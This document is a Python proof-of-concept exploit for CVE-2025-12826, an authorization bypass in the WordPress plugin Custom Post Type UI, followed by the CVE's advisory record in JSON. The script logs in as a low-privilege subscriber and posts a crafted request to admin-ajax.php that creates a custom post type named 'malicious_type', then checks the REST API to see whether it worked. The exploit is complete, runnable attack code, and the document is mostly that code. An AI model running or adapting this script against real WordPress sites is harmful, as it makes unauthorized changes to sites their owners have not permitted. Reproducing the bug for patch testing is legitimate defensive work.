CVE-2025-12826

# CVE-2025-12826 PoC - Custom Post Type UI Authorization Bypass # Affected: Custom Post Type UI <= 1.18.0 # Vulnerability: Missing capability check in cptui_process_post_type function import requests import sys target_url = "http://target-wordpress-site.com" username = "attacker" password = "password" # Step 1: Authenticate to WordPress session = requests.Session() login_url = f"{target_url}/wp-login.php" login_data = { "log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": "/wp-admin/" } response = session.post(login_url, data=login_data, allow_redirects=True) if "wordpress_logged_in" not in str(session.cookies) and "wordpress_sec_" not in str(session.cookies): print("[-] Login failed") sys.exit(1) print("[+] Logged in successfully as subscriber") # Step 2: Exploit the authorization bypass via admin-ajax.php ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Payload to create a malicious custom post type exploit_data = { "action": "cptui_process_post_type", "cpt_custom_post_type": "malicious_type", "cpt[post_type]": "malicious_type", "cpt[label]": "Malicious Type", "cpt[labels][name]": "Malicious Types", "cpt[labels][singular_name]": "Malicious Type", "cpt[description]": "Created via CVE-2025-12826 exploit", "cpt[public]": "true", "cpt[show_ui]": "true", "cpt[show_in_menu]": "true", "cpt[has_archive]": "true", "cpt[delete]": "false" } print("[*] Sending exploit payload to create custom post type...") response = session.post(ajax_url, data=exploit_data) if response.status_code == 200: print("[+] Exploit sent successfully") print(f"[*] Response: {response.text[:200]}") else: print(f"[-] Exploit failed with status code: {response.status_code}") # Alternative: Use REST API endpoint if available rest_url = f"{target_url}/wp-json/wp/v2/" print("[*] Checking if custom post type was created...") check_response = session.get(f"{rest_url}types") print(f"[*] Available post types: {check_response.text[:500]}")

{"cve": {"id": "CVE-2025-12826", "sourceIdentifier": "[email protected]", "published": "2025-12-04T07:16:14.920", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Custom Post Type UI plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.18.0. This is due to the plugin not verifying that a user has the required capability to perform actions in the \"cptui_process_post_type\" function. This makes it possible for authenticated attackers, with subscriber level access and above, to add, edit, or delete custom post types in limited situations."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/WebDevStudios/custom-post-type-ui/commit/215779a5ac0c624f0dcf875e87305b4898d5bcf9", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/90d203b1-9426-4eff-b566-02c8a1c6adfa?source=cve", "source": "[email protected]"}]}}